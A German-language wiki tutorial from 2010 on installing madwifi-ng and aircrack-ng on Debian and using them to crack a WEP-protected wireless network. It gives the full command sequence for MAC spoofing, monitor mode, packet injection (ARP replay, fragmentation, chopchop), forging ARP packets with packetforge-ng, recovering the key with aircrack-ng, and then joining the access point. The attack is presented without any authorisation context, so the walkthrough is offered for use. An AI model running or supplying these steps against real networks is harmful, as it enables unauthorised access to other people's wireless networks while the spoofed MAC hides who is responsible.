MADWIFI-NG UND AIRCRACK-NG BENUTZUNGS UND INSTALL FAQ AUF DEBIAN

Aus OPPServer.net Wiki | OPPs Wiki
Zur Navigation springen Zur Suche springen

MADWIFI-NG UND AIRCRACK-NG BENUTZUNGS UND INSTALL FAQ AUF DEBIAN (Stand 11.05.2010) [ © Oliver Schuetz aka OppTupacShakur | http://OPPServer.net | http://unix.oppserver.net ]

INSTALL UND CONFIG MADWIFI-NG

Als root anmelden: sudo -s oder nur su -

aptitude install patch
ifconfig ath0 down
ifconfig wifi0 down
cd /usr/local/src
svn -r 4129 checkout http://svn.madwifi-project.org/madwifi/trunk/ madwifi-ng
wget http://patches.aircrack-ng.org/madwifi-ng-r4073.patch
cd madwifi-ng
patch -Np1 -i ../madwifi-ng-r4073.patch
./scripts/madwifi-unload
make
make install
depmod -ae
modprobe ath_pci


INSTALL UND CONFIG AIRCRACK-NG

aptitude install build-essential subversion subversion-tools
cd /usr/local/src
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
cd aircrack-ng
make
make install

MONITORMODE EINSCHALTEN UND MAC ADRESSE AENDERN (FAKE MAC)

aptitude install macchanger
macchanger -s wifi0

Hier nun die Current MAC: merken, um sie spaeter evtl. wieder auf den Original Wert zurueckzusetzen

macchanger -s wifi0 > /root/wifi0_original_mac

So kann man sie auch einfach nach /root/wifi0_original_mac speichern.


wlanconfig ath0 destroy
ifconfig wifi0 down
macchanger --mac=00:11:22:33:44:55 wifi0

Hiermit wurde nun die FAKE MAC 00:11:22:33:44:55 auf wifi0 gesetzt.

ifconfig wifi0 up
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ifconfig ath0 up

Nun schauen wir uns die neue FAKEMAC von ath0 an:

macchanger -s ath0

Current MAC: 06:11:22:33:44:55 (unknown)

Das ist unsere FAKEMAC im folgenden Teil.


        1. WEP ####

AIRCRACK-NG, AIRODUMP-NG UND AIRREPLAY-NG ANLEITUNG

Injection testen:

aireplay-ng -B -9 ath0


airodump-ng ath0

Mit strg-c einmal stoppen und sich die MAC Adresse (BSSID), den Channel (CH) und den Namen (ESSID) des WLan Routers merken.

airodump-ng -w /pfad/wohin/ivsout -c CH -d BSSID ath0

Falls man nun hier schon einen verbunden Client sieht, kann man mit Methode 1 weiter machen, ohne Client nur mit Methode 2 oder 3.


Nun einen weiteren root Terminal oeffnen:

cd /pfad/wohin/

aireplay-ng -1 0 -e ESSID -a BSSID -h FAKEMAC ath0

Dies sollte dann dabei herauskommen:

Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)


METHODE 1

aireplay-ng -3 -b BSSID -h FAKEMAC ath0

Nun kann man im ersten root Terminal sehen das bei dem AP die Data Anzahl ziemlich schnell steig.


METHODE 2

aireplay-ng -5 -b BSSID -h FAKEMAC ath0

Warten bis ein Paket empfangen wurde und dann mit y > ENTER bestaetigen. Dann sollte folgende Meldung erscheinen:

Saving keystream in fragment-xxxx-xxxxxx.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Falls dann auch durch mehrmaliges y > ENTER immer wieder ein Still nothing, trying another packet... erscheint mit STRG+C abbrechen und eine weitere Methode testen.


METHODE 3

aireplay-ng -4 -b BSSID -h FAKEMAC ath0

Warten bist ein Paket empfangen wurde und dann mit y > ENTER bestaetigen. Durchlaufen lassen bis 100%, dann sollte folgende Meldung erscheinen:

Saving plaintext in replay_xxx-xxxx-xxxxxx.cap
Saving keystream in replay_xxx-xxxx-xxxxxx.xor

Completed in xxxs (xxx bytes/s)


NUR METHODE 2+3 Nun das empfangene in ein ARP Paket umwandeln:

packetforge-ng -0 -a BSSID -h FAKEMAC -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w arp-paket

oder halt

packetforge-ng -0 -a BSSID -h FAKEMAC -k 255.255.255.255 -l 255.255.255.255.255 -y replay_xxx-xxxx-xxxxxx.xor -w arp-paket

Darauf sollte folgende Ausgabe erscheinen:

Wrote packet to: arp-paket


aireplay-ng -2 -r arp-paket ath0
mit y > ENTER bestaetigen

Nun kann man im ersten root Terminal sehen das bei dem AP die Data Anzahl ziemlich schnell steig.


METHODE 1+2+3 Nun oeffnen wir den 3 root Terminal:

aircrack-ng -z -b BSSID ivsout*.cap

Dann sollte folgendes nach kurz oder lang erscheinen:

KEY FOUND! [ xx:xx:xx:xx:xx ] (ASCII: AT.HA )
        Decrypted correctly: 100%

Nun koennen wir erstmal aireplay und airodump in den ersten 2 root Terminals mit STRG+C beenden und loggen uns wie folgt auf dem AP an:

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode managed
ifconfig ath0 down
iwconfig ath0 essid ESSID channel CH key xx:xx:xx:xx:xx
ifconfig ath0 up
aptitude install dhcpcd
dhcpcd ath0

Dabei sollte nun folgendes erscheinen:

interface ath0 has been configured with new IP=xxx.xxx.xxx.xxx

HF ;)